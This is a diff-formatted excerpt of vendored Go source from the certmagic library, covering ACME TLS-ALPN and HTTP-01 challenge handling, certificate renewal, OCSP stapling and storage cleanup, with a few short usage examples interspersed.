if upstreamCert == nil {
|
||||
if log != nil {
|
||||
log.Debug("all external certificate managers yielded no certificates and no errors", zap.String("sni", hello.ServerName))
|
||||
}
|
||||
return Certificate{}, nil
|
||||
}
|
||||
|
||||
var cert Certificate
|
||||
err := fillCertFromLeaf(&cert, *upstreamCert)
|
||||
if err != nil {
|
||||
return Certificate{}, fmt.Errorf("external certificate manager: %s: filling cert from leaf: %v", hello.ServerName, err)
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Debug("using externally-managed certificate",
|
||||
zap.String("sni", hello.ServerName),
|
||||
zap.Strings("names", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter))
|
||||
}
|
||||
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// getTLSALPNChallengeCert is to be called when the clientHello pertains to
|
||||
// a TLS-ALPN challenge and a certificate is required to solve it. This method gets
|
||||
// the relevant challenge info and then returns the associated certificate (if any)
|
||||
// or generates it anew if it's not available (as is the case when distributed
|
||||
// solving). True is returned if the challenge is being solved in a distributed manner (there
|
||||
// is no semantic difference with distributed solving; it is mainly for logging).
|
||||
func (cfg *Config) getTLSALPNChallengeCert(clientHello *tls.ClientHelloInfo) (*tls.Certificate, bool, error) {
|
||||
chalData, distributed, err := cfg.getChallengeInfo(clientHello.Context(), clientHello.ServerName)
|
||||
if err != nil {
|
||||
return nil, distributed, err
|
||||
}
|
||||
|
||||
// fast path: we already created the certificate (this avoids having to re-create
|
||||
// it at every handshake that tries to verify, e.g. multi-perspective validation)
|
||||
if chalData.data != nil {
|
||||
return chalData.data.(*tls.Certificate), distributed, nil
|
||||
}
|
||||
|
||||
// otherwise, we can re-create the solution certificate, but it takes a few cycles
|
||||
cert, err := acmez.TLSALPN01ChallengeCert(chalData.Challenge)
|
||||
if err != nil {
|
||||
return nil, distributed, fmt.Errorf("making TLS-ALPN challenge certificate: %v", err)
|
||||
}
|
||||
if cert == nil {
|
||||
return nil, distributed, fmt.Errorf("got nil TLS-ALPN challenge certificate but no error")
|
||||
}
|
||||
|
||||
return cert, distributed, nil
|
||||
}
|
||||
|
||||
// getNameFromClientHello returns a normalized form of hello.ServerName.
|
||||
// If hello.ServerName is empty (i.e. client did not use SNI), then the
|
||||
// associated connection's local address is used to extract an IP address.
|
||||
func (*Config) getNameFromClientHello(hello *tls.ClientHelloInfo) string {
|
||||
if name := normalizedName(hello.ServerName); name != "" {
|
||||
return name
|
||||
}
|
||||
return localIPFromConn(hello.Conn)
|
||||
}
|
||||
|
||||
// localIPFromConn returns the host portion of c's local address
|
||||
// and strips the scope ID if one exists (see RFC 4007).
|
||||
func localIPFromConn(c net.Conn) string {
|
||||
if c == nil {
|
||||
return ""
|
||||
}
|
||||
localAddr := c.LocalAddr().String()
|
||||
ip, _, err := net.SplitHostPort(localAddr)
|
||||
if err != nil {
|
||||
// OK; assume there was no port
|
||||
ip = localAddr
|
||||
}
|
||||
// IPv6 addresses can have scope IDs, e.g. "fe80::4c3:3cff:fe4f:7e0b%eth0",
|
||||
// but for our purposes, these are useless (unless a valid use case proves
|
||||
// otherwise; see issue #3911)
|
||||
if scopeIDStart := strings.Index(ip, "%"); scopeIDStart > -1 {
|
||||
ip = ip[:scopeIDStart]
|
||||
}
|
||||
return ip
|
||||
}
|
||||
|
||||
// normalizedName returns a cleaned form of serverName that is
|
||||
// used for consistency when referring to a SNI value.
|
||||
func normalizedName(serverName string) string {
|
||||
return strings.ToLower(strings.TrimSpace(serverName))
|
||||
}
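A tiny self-contained illustration of the two name sources above: a present SNI value is lower-cased and trimmed, while an SNI-less connection falls back to its local IP with any IPv6 scope ID stripped. The sample values are made up.

package main

import (
	"fmt"
	"strings"
)

func main() {
	// SNI present: normalized by trimming and lower-casing.
	fmt.Println(strings.ToLower(strings.TrimSpace("  EXAMPLE.COM  "))) // "example.com"

	// No SNI: the connection's local address is used, with the IPv6 scope ID removed.
	ip := "fe80::4c3:3cff:fe4f:7e0b%eth0"
	if i := strings.Index(ip, "%"); i > -1 {
		ip = ip[:i]
	}
	fmt.Println(ip) // "fe80::4c3:3cff:fe4f:7e0b"
}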
|
||||
|
||||
// obtainCertWaitChans is used to coordinate obtaining certs for each hostname.
|
||||
var obtainCertWaitChans = make(map[string]chan struct{})
|
||||
var obtainCertWaitChansMu sync.Mutex
|
124
vendor/github.com/caddyserver/certmagic/httphandler.go
generated
vendored
Normal file
@ -0,0 +1,124 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"strings"
|
||||
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// HTTPChallengeHandler wraps h in a handler that can solve the ACME
|
||||
// HTTP challenge. cfg is required, and it must have a certificate
|
||||
// cache backed by a functional storage facility, since that is where
|
||||
// the challenge state is stored between initiation and solution.
|
||||
//
|
||||
// If a request is not an ACME HTTP challenge, h will be invoked.
|
||||
func (am *ACMEIssuer) HTTPChallengeHandler(h http.Handler) http.Handler {
|
||||
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if am.HandleHTTPChallenge(w, r) {
|
||||
return
|
||||
}
|
||||
h.ServeHTTP(w, r)
|
||||
})
|
||||
}
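A minimal sketch of how this wrapper is typically used on port 80, assuming `issuer` is an *ACMEIssuer already backed by usable storage (how it is configured is outside this sketch): requests under the ACME challenge path are answered by the issuer and everything else falls through to the application mux.

package main

import (
	"fmt"
	"log"
	"net/http"

	"github.com/caddyserver/certmagic"
)

func serveWithHTTP01(issuer *certmagic.ACMEIssuer) error {
	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "hello")
	})
	// /.well-known/acme-challenge/... is handled by the issuer; all other
	// requests reach mux unchanged.
	return http.ListenAndServe(":80", issuer.HTTPChallengeHandler(mux))
}

func main() {
	// DefaultACME is certmagic's package-level default issuer value; a real
	// deployment would configure its own issuer and storage.
	if err := serveWithHTTP01(&certmagic.DefaultACME); err != nil {
		log.Fatal(err)
	}
}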
|
||||
|
||||
// HandleHTTPChallenge uses am to solve challenge requests from an ACME
|
||||
// server that were initiated by this instance or any other instance in
|
||||
// this cluster (that is, any instances using the same storage as am does).
|
||||
//
|
||||
// If the HTTP challenge is disabled, this function is a no-op.
|
||||
//
|
||||
// If am is nil or if am does not have a certificate cache backed by
|
||||
// usable storage, solving the HTTP challenge will fail.
|
||||
//
|
||||
// It returns true if it handled the request; if so, the response has
|
||||
// already been written. If false is returned, this call was a no-op and
|
||||
// the request has not been handled.
|
||||
func (am *ACMEIssuer) HandleHTTPChallenge(w http.ResponseWriter, r *http.Request) bool {
|
||||
if am == nil {
|
||||
return false
|
||||
}
|
||||
if am.DisableHTTPChallenge {
|
||||
return false
|
||||
}
|
||||
if !LooksLikeHTTPChallenge(r) {
|
||||
return false
|
||||
}
|
||||
return am.distributedHTTPChallengeSolver(w, r)
|
||||
}
|
||||
|
||||
// distributedHTTPChallengeSolver checks to see if this challenge
|
||||
// request was initiated by this or another instance which uses the
|
||||
// same storage as am does, and attempts to complete the challenge for
|
||||
// it. It returns true if the request was handled; false otherwise.
|
||||
func (am *ACMEIssuer) distributedHTTPChallengeSolver(w http.ResponseWriter, r *http.Request) bool {
|
||||
if am == nil {
|
||||
return false
|
||||
}
|
||||
host := hostOnly(r.Host)
|
||||
chalInfo, distributed, err := am.config.getChallengeInfo(r.Context(), host)
|
||||
if err != nil {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Error("looking up info for HTTP challenge",
|
||||
zap.String("host", host),
|
||||
zap.Error(err))
|
||||
}
|
||||
return false
|
||||
}
|
||||
return solveHTTPChallenge(am.Logger, w, r, chalInfo.Challenge, distributed)
|
||||
}
|
||||
|
||||
// solveHTTPChallenge solves the HTTP challenge using the given challenge information.
|
||||
// If the challenge is being solved in a distributed fashion, set distributed to true for logging purposes.
|
||||
// It returns true if the properties of the request check out in relation to the HTTP challenge.
|
||||
// Most of this code borrowed from xenolf's built-in HTTP-01 challenge solver in March 2018.
|
||||
func solveHTTPChallenge(logger *zap.Logger, w http.ResponseWriter, r *http.Request, challenge acme.Challenge, distributed bool) bool {
|
||||
challengeReqPath := challenge.HTTP01ResourcePath()
|
||||
if r.URL.Path == challengeReqPath &&
|
||||
strings.EqualFold(hostOnly(r.Host), challenge.Identifier.Value) && // mitigate DNS rebinding attacks
|
||||
r.Method == "GET" {
|
||||
w.Header().Add("Content-Type", "text/plain")
|
||||
w.Write([]byte(challenge.KeyAuthorization))
|
||||
r.Close = true
|
||||
if logger != nil {
|
||||
logger.Info("served key authentication",
|
||||
zap.String("identifier", challenge.Identifier.Value),
|
||||
zap.String("challenge", "http-01"),
|
||||
zap.String("remote", r.RemoteAddr),
|
||||
zap.Bool("distributed", distributed))
|
||||
}
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// SolveHTTPChallenge solves the HTTP challenge. It should be used only on HTTP requests that are
|
||||
// from ACME servers trying to validate an identifier (i.e. LooksLikeHTTPChallenge() == true). It
|
||||
// returns true if the request criteria check out and it answered with key authentication, in which
|
||||
// case no further handling of the request is necessary.
|
||||
func SolveHTTPChallenge(logger *zap.Logger, w http.ResponseWriter, r *http.Request, challenge acme.Challenge) bool {
|
||||
return solveHTTPChallenge(logger, w, r, challenge, false)
|
||||
}
|
||||
|
||||
// LooksLikeHTTPChallenge returns true if r looks like an ACME
|
||||
// HTTP challenge request from an ACME server.
|
||||
func LooksLikeHTTPChallenge(r *http.Request) bool {
|
||||
return r.Method == "GET" && strings.HasPrefix(r.URL.Path, challengeBasePath)
|
||||
}
|
||||
|
||||
const challengeBasePath = "/.well-known/acme-challenge"
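A short sketch of the path check above (the token in the URL is made up): only GET requests under the well-known ACME path count as challenge requests.

package main

import (
	"fmt"
	"net/http/httptest"

	"github.com/caddyserver/certmagic"
)

func main() {
	chal := httptest.NewRequest("GET", "http://example.com/.well-known/acme-challenge/some-token", nil)
	other := httptest.NewRequest("POST", "http://example.com/login", nil)
	fmt.Println(certmagic.LooksLikeHTTPChallenge(chal))  // true
	fmt.Println(certmagic.LooksLikeHTTPChallenge(other)) // false
}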
|
678
vendor/github.com/caddyserver/certmagic/maintain.go
generated
vendored
Normal file
@ -0,0 +1,678 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/x509"
|
||||
"encoding/pem"
|
||||
"fmt"
|
||||
"log"
|
||||
"path"
|
||||
"runtime"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// maintainAssets is a permanently-blocking function
|
||||
// that loops indefinitely and, on a regular schedule, checks
|
||||
// certificates for expiration and initiates a renewal of certs
|
||||
// that are expiring soon. It also updates OCSP stapling. It
|
||||
// should only be called once per cache. Panics are recovered,
|
||||
// and if panicCount < 10, the function is called recursively,
|
||||
// incrementing panicCount each time. Initial invocation should
|
||||
// start panicCount at 0.
|
||||
func (certCache *Cache) maintainAssets(panicCount int) {
|
||||
log := loggerNamed(certCache.logger, "maintenance")
|
||||
if log != nil {
|
||||
log = log.With(zap.String("cache", fmt.Sprintf("%p", certCache)))
|
||||
}
|
||||
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
if log != nil {
|
||||
log.Error("panic", zap.Any("error", err), zap.ByteString("stack", buf))
|
||||
}
|
||||
if panicCount < 10 {
|
||||
certCache.maintainAssets(panicCount + 1)
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
renewalTicker := time.NewTicker(certCache.options.RenewCheckInterval)
|
||||
ocspTicker := time.NewTicker(certCache.options.OCSPCheckInterval)
|
||||
|
||||
if log != nil {
|
||||
log.Info("started background certificate maintenance")
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
defer cancel()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-renewalTicker.C:
|
||||
err := certCache.RenewManagedCertificates(ctx)
|
||||
if err != nil && log != nil {
|
||||
log.Error("renewing managed certificates", zap.Error(err))
|
||||
}
|
||||
case <-ocspTicker.C:
|
||||
certCache.updateOCSPStaples(ctx)
|
||||
case <-certCache.stopChan:
|
||||
renewalTicker.Stop()
|
||||
ocspTicker.Stop()
|
||||
if log != nil {
|
||||
log.Info("stopped background certificate maintenance")
|
||||
}
|
||||
close(certCache.doneChan)
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// RenewManagedCertificates renews managed certificates,
|
||||
// including ones loaded on-demand. Note that this is done
|
||||
// automatically on a regular basis; normally you will not
|
||||
// need to call this. This method assumes non-interactive
|
||||
// mode (i.e. operating in the background).
|
||||
func (certCache *Cache) RenewManagedCertificates(ctx context.Context) error {
|
||||
log := loggerNamed(certCache.logger, "maintenance")
|
||||
|
||||
// configs will hold a map of certificate name to the config
|
||||
// to use when managing that certificate
|
||||
configs := make(map[string]*Config)
|
||||
|
||||
// we use the queues for a very important reason: to do any and all
|
||||
// operations that could require an exclusive write lock outside
|
||||
// of the read lock! otherwise we get a deadlock, yikes. in other
|
||||
// words, our first iteration through the certificate cache does NOT
|
||||
// perform any operations--only queues them--so that more fine-grained
|
||||
// write locks may be obtained during the actual operations.
|
||||
var renewQueue, reloadQueue, deleteQueue []Certificate
|
||||
|
||||
certCache.mu.RLock()
|
||||
for certKey, cert := range certCache.cache {
|
||||
if !cert.managed {
|
||||
continue
|
||||
}
|
||||
|
||||
// the list of names on this cert should never be empty... programmer error?
|
||||
if len(cert.Names) == 0 {
|
||||
if log != nil {
|
||||
log.Warn("certificate has no names; removing from cache", zap.String("cert_key", certKey))
|
||||
}
|
||||
deleteQueue = append(deleteQueue, cert)
|
||||
continue
|
||||
}
|
||||
|
||||
// get the config associated with this certificate
|
||||
cfg, err := certCache.getConfig(cert)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("unable to get configuration to manage certificate; unable to renew",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
if cfg == nil {
|
||||
// this is bad if this happens, probably a programmer error (oops)
|
||||
if log != nil {
|
||||
log.Error("no configuration associated with certificate; unable to manage",
|
||||
zap.Strings("identifiers", cert.Names))
|
||||
}
|
||||
continue
|
||||
}
|
||||
if cfg.OnDemand != nil {
|
||||
continue
|
||||
}
|
||||
|
||||
// if time is up or expires soon, we need to try to renew it
|
||||
if cert.NeedsRenewal(cfg) {
|
||||
configs[cert.Names[0]] = cfg
|
||||
|
||||
// see if the certificate in storage has already been renewed, possibly by another
|
||||
// instance that didn't coordinate with this one; if so, just load it (this
|
||||
// might happen if another instance already renewed it - kinda sloppy but checking disk
|
||||
// first is a simple way to possibly drastically reduce rate limit problems)
|
||||
storedCertExpiring, err := cfg.managedCertInStorageExpiresSoon(ctx, cert)
|
||||
if err != nil {
|
||||
// hmm, weird, but not a big deal, maybe it was deleted or something
|
||||
if log != nil {
|
||||
log.Warn("error while checking if stored certificate is also expiring soon",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
} else if !storedCertExpiring {
|
||||
// if the certificate is NOT expiring soon and there was no error, then we
|
||||
// are good to just reload the certificate from storage instead of repeating
|
||||
// a likely-unnecessary renewal procedure
|
||||
reloadQueue = append(reloadQueue, cert)
|
||||
continue
|
||||
}
|
||||
|
||||
// the certificate in storage has not been renewed yet, so we will do it
|
||||
// NOTE: It is super-important to note that the TLS-ALPN challenge requires
|
||||
// a write lock on the cache in order to complete its challenge, so it is extra
|
||||
// vital that this renew operation does not happen inside our read lock!
|
||||
renewQueue = append(renewQueue, cert)
|
||||
}
|
||||
}
|
||||
certCache.mu.RUnlock()
|
||||
|
||||
// Reload certificates that merely need to be updated in memory
|
||||
for _, oldCert := range reloadQueue {
|
||||
timeLeft := oldCert.Leaf.NotAfter.Sub(time.Now().UTC())
|
||||
if log != nil {
|
||||
log.Info("certificate expires soon, but is already renewed in storage; reloading stored certificate",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
|
||||
cfg := configs[oldCert.Names[0]]
|
||||
|
||||
// crucially, this happens OUTSIDE a lock on the certCache
|
||||
_, err := cfg.reloadManagedCertificate(ctx, oldCert)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("loading renewed certificate",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
}
|
||||
|
||||
// Renewal queue
|
||||
for _, oldCert := range renewQueue {
|
||||
cfg := configs[oldCert.Names[0]]
|
||||
err := certCache.queueRenewalTask(ctx, oldCert, cfg)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("queueing renewal task",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
}
|
||||
|
||||
// Deletion queue
|
||||
certCache.mu.Lock()
|
||||
for _, cert := range deleteQueue {
|
||||
certCache.removeCertificate(cert)
|
||||
}
|
||||
certCache.mu.Unlock()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (certCache *Cache) queueRenewalTask(ctx context.Context, oldCert Certificate, cfg *Config) error {
|
||||
log := loggerNamed(certCache.logger, "maintenance")
|
||||
|
||||
timeLeft := oldCert.Leaf.NotAfter.Sub(time.Now().UTC())
|
||||
if log != nil {
|
||||
log.Info("certificate expires soon; queuing for renewal",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
|
||||
// Get the name which we should use to renew this certificate;
|
||||
// we only support managing certificates with one name per cert,
|
||||
// so this should be easy.
|
||||
renewName := oldCert.Names[0]
|
||||
|
||||
// queue up this renewal job (is a no-op if already active or queued)
|
||||
jm.Submit(cfg.Logger, "renew_"+renewName, func() error {
|
||||
timeLeft := oldCert.Leaf.NotAfter.Sub(time.Now().UTC())
|
||||
if log != nil {
|
||||
log.Info("attempting certificate renewal",
|
||||
zap.Strings("identifiers", oldCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
|
||||
// perform renewal - crucially, this happens OUTSIDE a lock on certCache
|
||||
err := cfg.RenewCertAsync(ctx, renewName, false)
|
||||
if err != nil {
|
||||
if cfg.OnDemand != nil {
|
||||
// loaded dynamically, remove dynamically
|
||||
certCache.mu.Lock()
|
||||
certCache.removeCertificate(oldCert)
|
||||
certCache.mu.Unlock()
|
||||
}
|
||||
return fmt.Errorf("%v %v", oldCert.Names, err)
|
||||
}
|
||||
|
||||
// successful renewal, so update in-memory cache by loading
|
||||
// renewed certificate so it will be used with handshakes
|
||||
_, err = cfg.reloadManagedCertificate(ctx, oldCert)
|
||||
if err != nil {
|
||||
return ErrNoRetry{fmt.Errorf("%v %v", oldCert.Names, err)}
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// updateOCSPStaples updates the OCSP stapling in all
|
||||
// eligible, cached certificates.
|
||||
//
|
||||
// OCSP maintenance strives to abide the relevant points on
|
||||
// Ryan Sleevi's recommendations for good OCSP support:
|
||||
// https://gist.github.com/sleevi/5efe9ef98961ecfb4da8
|
||||
func (certCache *Cache) updateOCSPStaples(ctx context.Context) {
|
||||
logger := loggerNamed(certCache.logger, "maintenance")
|
||||
|
||||
// temporary structures to store updates or tasks
|
||||
// so that we can keep our locks short-lived
|
||||
type ocspUpdate struct {
|
||||
rawBytes []byte
|
||||
parsed *ocsp.Response
|
||||
}
|
||||
type updateQueueEntry struct {
|
||||
cert Certificate
|
||||
certHash string
|
||||
lastNextUpdate time.Time
|
||||
cfg *Config
|
||||
}
|
||||
type renewQueueEntry struct {
|
||||
oldCert Certificate
|
||||
cfg *Config
|
||||
}
|
||||
updated := make(map[string]ocspUpdate)
|
||||
var updateQueue []updateQueueEntry // certs that need a refreshed staple
|
||||
var renewQueue []renewQueueEntry // certs that need to be renewed (due to revocation)
|
||||
|
||||
// obtain brief read lock during our scan to see which staples need updating
|
||||
certCache.mu.RLock()
|
||||
for certHash, cert := range certCache.cache {
|
||||
// no point in updating OCSP for expired or "synthetic" certificates
|
||||
if cert.Leaf == nil || cert.Expired() {
|
||||
continue
|
||||
}
|
||||
cfg, err := certCache.getConfig(cert)
|
||||
if err != nil {
|
||||
if logger != nil {
|
||||
logger.Error("unable to get automation config for certificate; maintenance for this certificate will likely fail",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
// always try to replace revoked certificates, even if OCSP response is still fresh
|
||||
if certShouldBeForceRenewed(cert) {
|
||||
renewQueue = append(renewQueue, renewQueueEntry{
|
||||
oldCert: cert,
|
||||
cfg: cfg,
|
||||
})
|
||||
continue
|
||||
}
|
||||
// if the status is not fresh, get a new one
|
||||
var lastNextUpdate time.Time
|
||||
if cert.ocsp != nil {
|
||||
lastNextUpdate = cert.ocsp.NextUpdate
|
||||
if cert.ocsp.Status != ocsp.Unknown && freshOCSP(cert.ocsp) {
|
||||
// no need to update our staple if still fresh and not Unknown
|
||||
continue
|
||||
}
|
||||
}
|
||||
updateQueue = append(updateQueue, updateQueueEntry{cert, certHash, lastNextUpdate, cfg})
|
||||
}
|
||||
certCache.mu.RUnlock()
|
||||
|
||||
// perform updates outside of any lock on certCache
|
||||
for _, qe := range updateQueue {
|
||||
cert := qe.cert
|
||||
certHash := qe.certHash
|
||||
lastNextUpdate := qe.lastNextUpdate
|
||||
|
||||
if qe.cfg == nil {
|
||||
// this is bad if this happens, probably a programmer error (oops)
|
||||
if logger != nil {
|
||||
logger.Error("no configuration associated with certificate; unable to manage OCSP staples",
|
||||
zap.Strings("identifiers", cert.Names))
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
err := stapleOCSP(ctx, qe.cfg.OCSP, qe.cfg.Storage, &cert, nil)
|
||||
if err != nil {
|
||||
if cert.ocsp != nil {
|
||||
// if there was no staple before, that's fine; otherwise we should log the error
|
||||
if logger != nil {
|
||||
logger.Error("stapling OCSP",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// By this point, we've obtained the latest OCSP response.
|
||||
// If there was no staple before, or if the response is updated, make
|
||||
// sure we apply the update to all names on the certificate if
|
||||
// the status is still Good.
|
||||
if cert.ocsp != nil && cert.ocsp.Status == ocsp.Good && (lastNextUpdate.IsZero() || lastNextUpdate != cert.ocsp.NextUpdate) {
|
||||
if logger != nil {
|
||||
logger.Info("advancing OCSP staple",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Time("from", lastNextUpdate),
|
||||
zap.Time("to", cert.ocsp.NextUpdate))
|
||||
}
|
||||
updated[certHash] = ocspUpdate{rawBytes: cert.Certificate.OCSPStaple, parsed: cert.ocsp}
|
||||
}
|
||||
|
||||
// If the updated staple shows that the certificate was revoked, we should immediately renew it
|
||||
if certShouldBeForceRenewed(cert) {
|
||||
renewQueue = append(renewQueue, renewQueueEntry{
|
||||
oldCert: cert,
|
||||
cfg: qe.cfg,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// These write locks should be brief since we have all the info we need now.
|
||||
for certKey, update := range updated {
|
||||
certCache.mu.Lock()
|
||||
if cert, ok := certCache.cache[certKey]; ok {
|
||||
cert.ocsp = update.parsed
|
||||
cert.Certificate.OCSPStaple = update.rawBytes
|
||||
certCache.cache[certKey] = cert
|
||||
}
|
||||
certCache.mu.Unlock()
|
||||
}
|
||||
|
||||
// We attempt to replace any certificates that were revoked.
|
||||
// Crucially, this happens OUTSIDE a lock on the certCache.
|
||||
for _, renew := range renewQueue {
|
||||
_, err := renew.cfg.forceRenew(ctx, logger, renew.oldCert)
|
||||
if err != nil && logger != nil {
|
||||
logger.Info("forcefully renewing certificate due to REVOKED status",
|
||||
zap.Strings("identifiers", renew.oldCert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// CleanStorageOptions specifies how to clean up a storage unit.
|
||||
type CleanStorageOptions struct {
|
||||
OCSPStaples bool
|
||||
ExpiredCerts bool
|
||||
ExpiredCertGracePeriod time.Duration
|
||||
}
|
||||
|
||||
// CleanStorage removes assets which are no longer useful,
|
||||
// according to opts.
|
||||
func CleanStorage(ctx context.Context, storage Storage, opts CleanStorageOptions) {
|
||||
if opts.OCSPStaples {
|
||||
err := deleteOldOCSPStaples(ctx, storage)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Deleting old OCSP staples: %v", err)
|
||||
}
|
||||
}
|
||||
if opts.ExpiredCerts {
|
||||
err := deleteExpiredCerts(ctx, storage, opts.ExpiredCertGracePeriod)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Deleting expired certificates: %v", err)
|
||||
}
|
||||
}
|
||||
// TODO: delete stale locks?
|
||||
}
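A minimal usage sketch of CleanStorage, assuming file-system storage at a hypothetical path and a 24-hour grace period; both are deployment choices, not values the library prescribes.

package main

import (
	"context"
	"time"

	"github.com/caddyserver/certmagic"
)

func main() {
	storage := &certmagic.FileStorage{Path: "/var/lib/certmagic"} // hypothetical path
	certmagic.CleanStorage(context.Background(), storage, certmagic.CleanStorageOptions{
		OCSPStaples:            true,
		ExpiredCerts:           true,
		ExpiredCertGracePeriod: 24 * time.Hour,
	})
}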
|
||||
|
||||
func deleteOldOCSPStaples(ctx context.Context, storage Storage) error {
|
||||
ocspKeys, err := storage.List(ctx, prefixOCSP, false)
|
||||
if err != nil {
|
||||
// maybe just hasn't been created yet; no big deal
|
||||
return nil
|
||||
}
|
||||
for _, key := range ocspKeys {
|
||||
// if context was cancelled, quit early; otherwise proceed
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
default:
|
||||
}
|
||||
ocspBytes, err := storage.Load(ctx, key)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] While deleting old OCSP staples, unable to load staple file: %v", err)
|
||||
continue
|
||||
}
|
||||
resp, err := ocsp.ParseResponse(ocspBytes, nil)
|
||||
if err != nil {
|
||||
// contents are invalid; delete it
|
||||
err = storage.Delete(ctx, key)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Purging corrupt staple file %s: %v", key, err)
|
||||
}
|
||||
continue
|
||||
}
|
||||
if time.Now().After(resp.NextUpdate) {
|
||||
// response has expired; delete it
|
||||
err = storage.Delete(ctx, key)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Purging expired staple file %s: %v", key, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func deleteExpiredCerts(ctx context.Context, storage Storage, gracePeriod time.Duration) error {
|
||||
issuerKeys, err := storage.List(ctx, prefixCerts, false)
|
||||
if err != nil {
|
||||
// maybe just hasn't been created yet; no big deal
|
||||
return nil
|
||||
}
|
||||
|
||||
for _, issuerKey := range issuerKeys {
|
||||
siteKeys, err := storage.List(ctx, issuerKey, false)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Listing contents of %s: %v", issuerKey, err)
|
||||
continue
|
||||
}
|
||||
|
||||
for _, siteKey := range siteKeys {
|
||||
// if context was cancelled, quit early; otherwise proceed
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
default:
|
||||
}
|
||||
|
||||
siteAssets, err := storage.List(ctx, siteKey, false)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Listing contents of %s: %v", siteKey, err)
|
||||
continue
|
||||
}
|
||||
|
||||
for _, assetKey := range siteAssets {
|
||||
if path.Ext(assetKey) != ".crt" {
|
||||
continue
|
||||
}
|
||||
|
||||
certFile, err := storage.Load(ctx, assetKey)
|
||||
if err != nil {
|
||||
return fmt.Errorf("loading certificate file %s: %v", assetKey, err)
|
||||
}
|
||||
block, _ := pem.Decode(certFile)
|
||||
if block == nil || block.Type != "CERTIFICATE" {
|
||||
return fmt.Errorf("certificate file %s does not contain PEM-encoded certificate", assetKey)
|
||||
}
|
||||
cert, err := x509.ParseCertificate(block.Bytes)
|
||||
if err != nil {
|
||||
return fmt.Errorf("certificate file %s is malformed; error parsing PEM: %v", assetKey, err)
|
||||
}
|
||||
|
||||
